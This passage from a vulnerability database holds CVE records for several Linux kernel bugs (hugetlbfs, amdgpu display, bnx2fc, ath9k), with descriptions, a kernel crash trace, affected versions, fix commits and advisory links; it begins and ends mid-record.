"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T19:54:47.949Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0841"
},
{
"name": "RHBZ#2256490",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256490"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-02T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-01-23T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: hugetlbfs: null pointer dereference in hugetlbfs_fill_super function",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0841",
"datePublished": "2024-01-28T11:20:40.159Z",
"dateReserved": "2024-01-23T21:14:44.230Z",
"dateUpdated": "2025-11-06T19:54:47.949Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27045 (GCVE-0-2024-27045)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix a potential buffer overflow in 'dp_dsc_clock_en_read()'
Tell snprintf() to store at most 10 bytes in the output buffer
instead of 30.
Fixes the below:
drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_debugfs.c:1508 dp_dsc_clock_en_read() error: snprintf() is printing too much 30 vs 10
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 Version: c06e09b76639657f284bfaf1cce29557a2515e85 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff28893c96c5e0927a4da10cd24a3522ca663515"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/440f059837418fac1695b65d3ebc6080d33be877"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d346b3e5b25c95d504478507eb867cd3818775ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad76fd30557d6a106c481e4606a981221ca525f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb9327af3621d26b1d83f767c97a3fe8191a3a65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf114d8d4a8d78df272116a745bb43b48cef65f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b09715f1504f1b6e8dff0e9643630610bc05141"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27045",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:14.603651Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:32.475Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ff28893c96c5e0927a4da10cd24a3522ca663515",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "440f059837418fac1695b65d3ebc6080d33be877",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "d346b3e5b25c95d504478507eb867cd3818775ab",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "ad76fd30557d6a106c481e4606a981221ca525f7",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "eb9327af3621d26b1d83f767c97a3fe8191a3a65",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "cf114d8d4a8d78df272116a745bb43b48cef65f4",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
},
{
"lessThan": "4b09715f1504f1b6e8dff0e9643630610bc05141",
"status": "affected",
"version": "c06e09b76639657f284bfaf1cce29557a2515e85",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix a potential buffer overflow in \u0027dp_dsc_clock_en_read()\u0027\n\nTell snprintf() to store at most 10 bytes in the output buffer\ninstead of 30.\n\nFixes the below:\ndrivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_debugfs.c:1508 dp_dsc_clock_en_read() error: snprintf() is printing too much 30 vs 10"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:01.141Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ff28893c96c5e0927a4da10cd24a3522ca663515"
},
{
"url": "https://git.kernel.org/stable/c/440f059837418fac1695b65d3ebc6080d33be877"
},
{
"url": "https://git.kernel.org/stable/c/d346b3e5b25c95d504478507eb867cd3818775ab"
},
{
"url": "https://git.kernel.org/stable/c/ad76fd30557d6a106c481e4606a981221ca525f7"
},
{
"url": "https://git.kernel.org/stable/c/eb9327af3621d26b1d83f767c97a3fe8191a3a65"
},
{
"url": "https://git.kernel.org/stable/c/cf114d8d4a8d78df272116a745bb43b48cef65f4"
},
{
"url": "https://git.kernel.org/stable/c/4b09715f1504f1b6e8dff0e9643630610bc05141"
}
],
"title": "drm/amd/display: Fix a potential buffer overflow in \u0027dp_dsc_clock_en_read()\u0027",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27045",
"datePublished": "2024-05-01T12:54:18.138Z",
"dateReserved": "2024-02-19T14:20:24.213Z",
"dateUpdated": "2025-05-04T09:03:01.141Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36919 (GCVE-0-2024-36919)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: bnx2fc: Remove spin_lock_bh while releasing resources after upload
The session resources are used by FW and driver when session is offloaded,
once session is uploaded these resources are not used. The lock is not
required as these fields won't be used any longer. The offload and upload
calls are sequential, hence lock is not required.
This will suppress following BUG_ON():
[ 449.843143] ------------[ cut here ]------------
[ 449.848302] kernel BUG at mm/vmalloc.c:2727!
[ 449.853072] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 449.858712] CPU: 5 PID: 1996 Comm: kworker/u24:2 Not tainted 5.14.0-118.el9.x86_64 #1
Rebooting.
[ 449.867454] Hardware name: Dell Inc. PowerEdge R730/0WCJNT, BIOS 2.3.4 11/08/2016
[ 449.876966] Workqueue: fc_rport_eq fc_rport_work [libfc]
[ 449.882910] RIP: 0010:vunmap+0x2e/0x30
[ 449.887098] Code: 00 65 8b 05 14 a2 f0 4a a9 00 ff ff 00 75 1b 55 48 89 fd e8 34 36 79 00 48 85 ed 74 0b 48 89 ef 31 f6 5d e9 14 fc ff ff 5d c3 <0f> 0b 0f 1f 44 00 00 41 57 41 56 49 89 ce 41 55 49 89 fd 41 54 41
[ 449.908054] RSP: 0018:ffffb83d878b3d68 EFLAGS: 00010206
[ 449.913887] RAX: 0000000080000201 RBX: ffff8f4355133550 RCX: 000000000d400005
[ 449.921843] RDX: 0000000000000001 RSI: 0000000000001000 RDI: ffffb83da53f5000
[ 449.929808] RBP: ffff8f4ac6675800 R08: ffffb83d878b3d30 R09: 00000000000efbdf
[ 449.937774] R10: 0000000000000003 R11: ffff8f434573e000 R12: 0000000000001000
[ 449.945736] R13: 0000000000001000 R14: ffffb83da53f5000 R15: ffff8f43d4ea3ae0
[ 449.953701] FS: 0000000000000000(0000) GS:ffff8f529fc80000(0000) knlGS:0000000000000000
[ 449.962732] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 449.969138] CR2: 00007f8cf993e150 CR3: 0000000efbe10003 CR4: 00000000003706e0
[ 449.977102] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 449.985065] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 449.993028] Call Trace:
[ 449.995756] __iommu_dma_free+0x96/0x100
[ 450.000139] bnx2fc_free_session_resc+0x67/0x240 [bnx2fc]
[ 450.006171] bnx2fc_upload_session+0xce/0x100 [bnx2fc]
[ 450.011910] bnx2fc_rport_event_handler+0x9f/0x240 [bnx2fc]
[ 450.018136] fc_rport_work+0x103/0x5b0 [libfc]
[ 450.023103] process_one_work+0x1e8/0x3c0
[ 450.027581] worker_thread+0x50/0x3b0
[ 450.031669] ? rescuer_thread+0x370/0x370
[ 450.036143] kthread+0x149/0x170
[ 450.039744] ? set_kthread_struct+0x40/0x40
[ 450.044411] ret_from_fork+0x22/0x30
[ 450.048404] Modules linked in: vfat msdos fat xfs nfs_layout_nfsv41_files rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver dm_service_time qedf qed crc8 bnx2fc libfcoe libfc scsi_transport_fc intel_rapl_msr intel_rapl_common x86_pkg_temp_thermal intel_powerclamp dcdbas rapl intel_cstate intel_uncore mei_me pcspkr mei ipmi_ssif lpc_ich ipmi_si fuse zram ext4 mbcache jbd2 loop nfsv3 nfs_acl nfs lockd grace fscache netfs irdma ice sd_mod t10_pi sg ib_uverbs ib_core 8021q garp mrp stp llc mgag200 i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt mxm_wmi fb_sys_fops cec crct10dif_pclmul ahci crc32_pclmul bnx2x drm ghash_clmulni_intel libahci rfkill i40e libata megaraid_sas mdio wmi sunrpc lrw dm_crypt dm_round_robin dm_multipath dm_snapshot dm_bufio dm_mirror dm_region_hash dm_log dm_zero dm_mod linear raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid6_pq libcrc32c crc32c_intel raid1 raid0 iscsi_ibft squashfs be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls
[ 450.048497] libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi edd ipmi_devintf ipmi_msghandler
[ 450.159753] ---[ end trace 712de2c57c64abc8 ]---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36919",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-07T14:28:01.393911Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-07T14:28:19.585Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-05T08:03:33.761Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/468f3e3c15076338367b0945b041105b67cf31e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/acd370c1fb86b7302c1cbb354a7c1cd9953768eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad498539dda0816aadef384ec117bfea304c75c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93aa5ccc44781bdfef1bf0bc4c2c292d45251312"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1150606d47d711d5bfdf329a1a96ed7027085936"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c885ab23206b1f1ba0731ffe7c9455c6a91db256"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea50941cd8c9f0b12f38b73d3b1bfeca660dd342"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c214ed2a4dda35b308b0b28eed804d7ae66401f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0009/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/bnx2fc/bnx2fc_tgt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "468f3e3c15076338367b0945b041105b67cf31e3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "acd370c1fb86b7302c1cbb354a7c1cd9953768eb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ad498539dda0816aadef384ec117bfea304c75c3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "93aa5ccc44781bdfef1bf0bc4c2c292d45251312",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1150606d47d711d5bfdf329a1a96ed7027085936",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c885ab23206b1f1ba0731ffe7c9455c6a91db256",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ea50941cd8c9f0b12f38b73d3b1bfeca660dd342",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c214ed2a4dda35b308b0b28eed804d7ae66401f9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/bnx2fc/bnx2fc_tgt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: bnx2fc: Remove spin_lock_bh while releasing resources after upload\n\nThe session resources are used by FW and driver when session is offloaded,\nonce session is uploaded these resources are not used. The lock is not\nrequired as these fields won\u0027t be used any longer. The offload and upload\ncalls are sequential, hence lock is not required.\n\nThis will suppress following BUG_ON():\n\n[ 449.843143] ------------[ cut here ]------------\n[ 449.848302] kernel BUG at mm/vmalloc.c:2727!\n[ 449.853072] invalid opcode: 0000 [#1] PREEMPT SMP PTI\n[ 449.858712] CPU: 5 PID: 1996 Comm: kworker/u24:2 Not tainted 5.14.0-118.el9.x86_64 #1\nRebooting.\n[ 449.867454] Hardware name: Dell Inc. PowerEdge R730/0WCJNT, BIOS 2.3.4 11/08/2016\n[ 449.876966] Workqueue: fc_rport_eq fc_rport_work [libfc]\n[ 449.882910] RIP: 0010:vunmap+0x2e/0x30\n[ 449.887098] Code: 00 65 8b 05 14 a2 f0 4a a9 00 ff ff 00 75 1b 55 48 89 fd e8 34 36 79 00 48 85 ed 74 0b 48 89 ef 31 f6 5d e9 14 fc ff ff 5d c3 \u003c0f\u003e 0b 0f 1f 44 00 00 41 57 41 56 49 89 ce 41 55 49 89 fd 41 54 41\n[ 449.908054] RSP: 0018:ffffb83d878b3d68 EFLAGS: 00010206\n[ 449.913887] RAX: 0000000080000201 RBX: ffff8f4355133550 RCX: 000000000d400005\n[ 449.921843] RDX: 0000000000000001 RSI: 0000000000001000 RDI: ffffb83da53f5000\n[ 449.929808] RBP: ffff8f4ac6675800 R08: ffffb83d878b3d30 R09: 00000000000efbdf\n[ 449.937774] R10: 0000000000000003 R11: ffff8f434573e000 R12: 0000000000001000\n[ 449.945736] R13: 0000000000001000 R14: ffffb83da53f5000 R15: ffff8f43d4ea3ae0\n[ 449.953701] FS: 0000000000000000(0000) GS:ffff8f529fc80000(0000) knlGS:0000000000000000\n[ 449.962732] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 449.969138] CR2: 00007f8cf993e150 CR3: 0000000efbe10003 CR4: 00000000003706e0\n[ 449.977102] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 449.985065] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 449.993028] Call Trace:\n[ 449.995756] __iommu_dma_free+0x96/0x100\n[ 450.000139] bnx2fc_free_session_resc+0x67/0x240 [bnx2fc]\n[ 450.006171] bnx2fc_upload_session+0xce/0x100 [bnx2fc]\n[ 450.011910] bnx2fc_rport_event_handler+0x9f/0x240 [bnx2fc]\n[ 450.018136] fc_rport_work+0x103/0x5b0 [libfc]\n[ 450.023103] process_one_work+0x1e8/0x3c0\n[ 450.027581] worker_thread+0x50/0x3b0\n[ 450.031669] ? rescuer_thread+0x370/0x370\n[ 450.036143] kthread+0x149/0x170\n[ 450.039744] ? set_kthread_struct+0x40/0x40\n[ 450.044411] ret_from_fork+0x22/0x30\n[ 450.048404] Modules linked in: vfat msdos fat xfs nfs_layout_nfsv41_files rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver dm_service_time qedf qed crc8 bnx2fc libfcoe libfc scsi_transport_fc intel_rapl_msr intel_rapl_common x86_pkg_temp_thermal intel_powerclamp dcdbas rapl intel_cstate intel_uncore mei_me pcspkr mei ipmi_ssif lpc_ich ipmi_si fuse zram ext4 mbcache jbd2 loop nfsv3 nfs_acl nfs lockd grace fscache netfs irdma ice sd_mod t10_pi sg ib_uverbs ib_core 8021q garp mrp stp llc mgag200 i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt mxm_wmi fb_sys_fops cec crct10dif_pclmul ahci crc32_pclmul bnx2x drm ghash_clmulni_intel libahci rfkill i40e libata megaraid_sas mdio wmi sunrpc lrw dm_crypt dm_round_robin dm_multipath dm_snapshot dm_bufio dm_mirror dm_region_hash dm_log dm_zero dm_mod linear raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid6_pq libcrc32c crc32c_intel raid1 raid0 iscsi_ibft squashfs be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls\n[ 450.048497] libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi edd ipmi_devintf ipmi_msghandler\n[ 450.159753] ---[ end trace 712de2c57c64abc8 ]---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:04.893Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/468f3e3c15076338367b0945b041105b67cf31e3"
},
{
"url": "https://git.kernel.org/stable/c/acd370c1fb86b7302c1cbb354a7c1cd9953768eb"
},
{
"url": "https://git.kernel.org/stable/c/ad498539dda0816aadef384ec117bfea304c75c3"
},
{
"url": "https://git.kernel.org/stable/c/93aa5ccc44781bdfef1bf0bc4c2c292d45251312"
},
{
"url": "https://git.kernel.org/stable/c/1150606d47d711d5bfdf329a1a96ed7027085936"
},
{
"url": "https://git.kernel.org/stable/c/c885ab23206b1f1ba0731ffe7c9455c6a91db256"
},
{
"url": "https://git.kernel.org/stable/c/ea50941cd8c9f0b12f38b73d3b1bfeca660dd342"
},
{
"url": "https://git.kernel.org/stable/c/c214ed2a4dda35b308b0b28eed804d7ae66401f9"
}
],
"title": "scsi: bnx2fc: Remove spin_lock_bh while releasing resources after upload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36919",
"datePublished": "2024-05-30T15:29:14.486Z",
"dateReserved": "2024-05-30T15:25:07.068Z",
"dateUpdated": "2025-05-04T09:12:04.893Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52594 (GCVE-0-2023-52594)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-21 08:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus()
Fix an array-index-out-of-bounds read in ath9k_htc_txstatus(). The bug
occurs when txs->cnt, data from a URB provided by a USB device, is
bigger than the size of the array txs->txstatus, which is
HTC_MAX_TX_STATUS. WARN_ON() already checks it, but there is no bug
handling code after the check. Make the function return if that is the
case.
Found by a modified version of syzkaller.
UBSAN: array-index-out-of-bounds in htc_drv_txrx.c
index 13 is out of range for type '__wmi_event_txstatus [12]'
Call Trace:
ath9k_htc_txstatus
ath9k_wmi_event_tasklet
